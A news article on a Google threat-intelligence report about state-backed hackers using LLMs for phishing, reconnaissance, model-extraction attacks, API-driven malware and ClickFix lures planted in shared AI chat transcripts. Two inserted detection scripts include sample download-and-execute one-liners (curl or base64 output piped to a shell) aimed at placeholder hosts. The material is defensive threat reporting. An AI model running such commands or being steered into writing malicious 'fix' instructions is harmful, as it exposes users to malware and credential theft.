Google: State-Sponsored Hackers Leverage AI in Cyberattacks

State-sponsored hackers are increasingly using AI, including large language models, to enhance cyberattacks. This report details how actors from Iran, North Korea, China, and Russia are weaponizing AI for sophisticated phishing, accelerated malware development, and AI-driven reconnaissance, particularly targeting the defense sector. The analysis also highlights a surge in model extraction attacks, the emergence of AI-integrated malware, and the exploitation of AI chat platforms for malicious campaigns. While AI is transforming the threat landscape, Google emphasizes ongoing efforts to disrupt malicious activity and improve AI model defenses.

State-sponsored hackers are increasingly leveraging artificial intelligence to enhance their cyberattack capabilities, according to a new report from Google’s Threat Intelligence Group (GTIG). Threat actors from Iran, North Korea, China, and Russia are reportedly weaponizing large language models (LLMs), including Google’s Gemini, to craft more sophisticated phishing campaigns and accelerate malware development.

The Q4 2025 AI Threat Tracker report highlights how government-backed attackers have integrated AI across the entire attack lifecycle, realizing significant productivity gains in areas such as reconnaissance, social engineering, and malware creation. “For government-backed threat actors, large language models have become essential tools for technical research, targeting, and the rapid generation of nuanced phishing lures,” the GTIG researchers stated.

**AI-Driven Reconnaissance Targets Defense Sector**

Iranian threat actor APT42 has been observed using Gemini to augment its reconnaissance efforts and conduct targeted social engineering. The group reportedly employed the AI model to identify official email addresses for specific entities and to research potential targets, enabling them to create more credible pretexts for initial contact. By inputting a target’s biographical information into Gemini, APT42 could generate tailored personas and scenarios designed to elicit engagement. The AI’s translation capabilities also assisted the group in overcoming language barriers, helping them to bypass traditional phishing indicators like poor grammar or awkward syntax.

Similarly, North Korean government-backed actor UNC2970, which focuses on defense sector targets and impersonates corporate recruiters, has utilized Gemini to synthesize open-source intelligence and profile high-value targets. Their reconnaissance activities included searching for information on major cybersecurity and defense companies, identifying specific technical job roles, and gathering salary benchmarks. This sophisticated approach blurs the lines between legitimate professional research and malicious intelligence gathering, providing attackers with the necessary components to construct highly convincing phishing personas.

**Surge in Model Extraction Attacks**

Beyond direct operational misuse, Google DeepMind and GTIG have identified a notable increase in “model extraction” or “distillation attacks.” These attacks aim to steal intellectual property by replicating the functionality and knowledge base of AI models. One campaign specifically targeting Gemini’s reasoning capabilities involved submitting over 100,000 prompts with the objective of coercing the model into revealing its full reasoning processes. The extensive nature of these queries suggests an attempt to replicate Gemini’s decision-making abilities in various tasks and across different non-English languages.

While GTIG has not yet observed direct attacks on frontier models by advanced persistent threat (APT) actors, it has detected and disrupted frequent model extraction attempts originating from private sector entities and researchers globally, all seeking to clone proprietary AI logic. Google’s security systems reportedly identified these attacks in real time and deployed defenses to safeguard internal reasoning traces.

**Emergence of AI-Integrated Malware**

The GTIG report also details the emergence of malware samples, tracked as HONESTCUE, that leverage Gemini’s API to outsource functionality generation. This malware employs a multi-layered obfuscation strategy designed to evade traditional network-based detection and static analysis. HONESTCUE operates as a downloader and launcher framework, sending prompts to Gemini’s API and receiving C# source code as responses. The subsequent payloads are compiled and executed directly in memory, leaving minimal to no forensic artifacts on disk.
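The behaviour described above suggests a sequence defenders can hunt for: a process that is not a sanctioned developer tool contacts an LLM API and shortly afterwards compiles C#. The sketch below is an added example, not code or indicators from the GTIG report; the event schema, the allowlist, the compiler markers and the sample telemetry are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Assumptions, not report indicators: the event schema, the allowlist and the
# compiler markers. The hostname is the public Gemini API endpoint.
LLM_API_HOSTS = {"generativelanguage.googleapis.com"}
COMPILER_MARKERS = ("microsoft.codeanalysis.csharp.dll", "csc.exe")
ALLOWLIST = {"devenv.exe"}  # sanctioned tools expected to call an LLM and compile
WINDOW = timedelta(minutes=5)

def ev(ts, pid, image, kind, value, host="ws-17"):
    return {"ts": ts, "host": host, "pid": pid, "image": image, "type": kind, "value": value}

# Constructed sample telemetry (DNS queries, image loads, child processes).
EVENTS = [
    ev("2026-01-10T09:00:01", 4120, "chrome.exe", "dns", "generativelanguage.googleapis.com"),
    ev("2026-01-10T09:02:10", 5532, "updater.exe", "dns", "generativelanguage.googleapis.com"),
    ev("2026-01-10T09:02:40", 5532, "updater.exe", "image_load", r"C:\ProgramData\upd\Microsoft.CodeAnalysis.CSharp.dll"),
    ev("2026-01-10T09:10:00", 6001, "msbuild.exe", "child_process", r"C:\BuildTools\Roslyn\csc.exe"),
    ev("2026-01-10T09:15:00", 7300, "notes.exe", "dns", "generativelanguage.googleapis.com"),
    ev("2026-01-10T09:40:00", 7300, "notes.exe", "image_load", r"C:\Apps\notes\Microsoft.CodeAnalysis.CSharp.dll"),
    ev("2026-01-10T09:50:00", 8100, "devenv.exe", "dns", "generativelanguage.googleapis.com"),
    ev("2026-01-10T09:51:00", 8100, "devenv.exe", "image_load", r"C:\VS\Microsoft.CodeAnalysis.CSharp.dll"),
]

def find_llm_compile_chains(events, window=WINDOW):
    """Return (host, pid, image) for processes that contact an LLM API and
    then load or spawn a C# compiler within `window`."""
    last_api_contact, hits = {}, []
    for e in sorted(events, key=lambda e: e["ts"]):
        key = (e["host"], e["pid"])
        ts = datetime.fromisoformat(e["ts"])
        value = e["value"].lower()
        if e["type"] == "dns" and value in LLM_API_HOSTS:
            last_api_contact[key] = ts
        elif e["type"] in ("image_load", "child_process") and value.endswith(COMPILER_MARKERS):
            seen = last_api_contact.get(key)
            hit = (e["host"], e["pid"], e["image"])
            if (seen is not None and ts - seen <= window
                    and e["image"].lower() not in ALLOWLIST and hit not in hits):
                hits.append(hit)
    return hits

if __name__ == "__main__":
    for host, pid, image in find_llm_compile_chains(EVENTS):
        print(f"review {image} (pid {pid}) on {host}: LLM API contact followed by C# compilation")
```

Neither signal is suspicious alone: browsers reach the API constantly and build tools compile C# all day. The correlation within one process and a short window is what narrows the result to something worth triage.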

In a separate development, GTIG identified COINBAIT, a phishing kit whose development appears to have been significantly accelerated by AI code generation tools. This kit, designed to impersonate a major cryptocurrency exchange to harvest credentials, was reportedly built using the AI-powered platform Lovable AI.

**ClickFix Campaigns Exploit AI Chat Platforms**

A novel social engineering campaign, first observed in late 2025, involves threat actors abusing the public sharing features of generative AI services like Gemini, ChatGPT, Copilot, DeepSeek, and Grok. Attackers have manipulated these AI models to generate seemingly legitimate instructions for common computer tasks, embedding malicious command-line scripts within the provided “solutions.” By sharing links to these AI chat transcripts, threat actors can leverage trusted domains to host the initial stages of their attacks, distributing ATOMIC malware targeting macOS systems. This three-stage ClickFix attack chain cleverly exploits the trust associated with AI-generated content.
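Because the lure arrives on a trusted domain, the practical control point is the command itself, wherever it was copied from. The following added example (not from the report) flags terminal commands whose shape is download-and-execute so they can be reviewed before being run or surfaced from shell telemetry; the rule set and the sample commands are constructed assumptions, since the campaign's actual commands are not reproduced on this page.

```python
import re

# Assumed rule set: common shapes of download-and-execute one-liners.
RULES = {
    "download_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "decoded_blob_piped_to_shell": re.compile(
        r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "shell_runs_download_substitution": re.compile(
        r"\b(ba|z)?sh\s+-c\s+[\"']?\$\(\s*(curl|wget)\b"),
}

# Constructed sample: commands as they might appear in "how to fix" steps.
SAMPLE = [
    "softwareupdate --list",
    "curl -fsSL https://example.invalid/fix.sh | bash",
    "echo Y29uc3RydWN0ZWQ= | base64 -d | sh",
    '/bin/zsh -c "$(curl -fsSL https://example.invalid/setup)"',
    "curl -O https://example.invalid/report.pdf",
]

def review_commands(commands):
    """Return (command, [rule names]) for every command matching a rule."""
    findings = []
    for cmd in commands:
        matched = sorted(name for name, rx in RULES.items() if rx.search(cmd))
        if matched:
            findings.append((cmd, matched))
    return findings

if __name__ == "__main__":
    for cmd, rules in review_commands(SAMPLE):
        print(f"hold for review [{', '.join(rules)}]: {cmd}")
```

A match means "fetches or decodes content and hands it straight to a shell", which some legitimate installers also do, so treat hits as a prompt for review rather than a verdict.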

**Underground Marketplaces Thrive on Stolen API Keys**

Analysis of English and Russian-language underground forums reveals a persistent demand for AI-enabled tools and services within the cybercriminal ecosystem. However, state-sponsored hackers and other malicious actors often face challenges in developing bespoke AI models. Consequently, they frequently resort to utilizing mature commercial AI products, accessing them through compromised API keys. One such toolkit, “Xanthorox,” advertised as a custom AI for autonomous malware generation and phishing campaign development, was found by GTIG to be powered by several commercial AI products, including Gemini, accessed via stolen API keys, rather than being a truly bespoke creation.

**Google’s Response and Mitigation Efforts**

In response to these evolving threats, Google has taken action against identified threat actors by disabling accounts and assets associated with malicious activity. The company is also continuously enhancing its AI models and classifiers to better identify and refuse requests that could facilitate malicious attacks. “We are committed to developing AI boldly and responsibly, which means taking proactive steps to disrupt malicious activity by disabling the projects and accounts associated with bad actors, while continuously improving our models to make them less susceptible to misuse,” the report stated.

Despite these advancements in AI-powered cyberattacks, GTIG emphasizes that no APT or information operations actors have yet achieved breakthrough capabilities that fundamentally alter the overall threat landscape. The findings underscore the critical and rapidly evolving role of AI in cybersecurity, as both defenders and attackers race to harness the technology’s capabilities. For enterprise security teams, particularly those in regions where state-sponsored cyber activity remains high, the report serves as a crucial reminder to bolster defenses against AI-augmented social engineering and reconnaissance operations.

Original article, Author: Samuel Thompson. If you wish to reprint this article, please indicate the source: https://aicnbc.com/17351.html
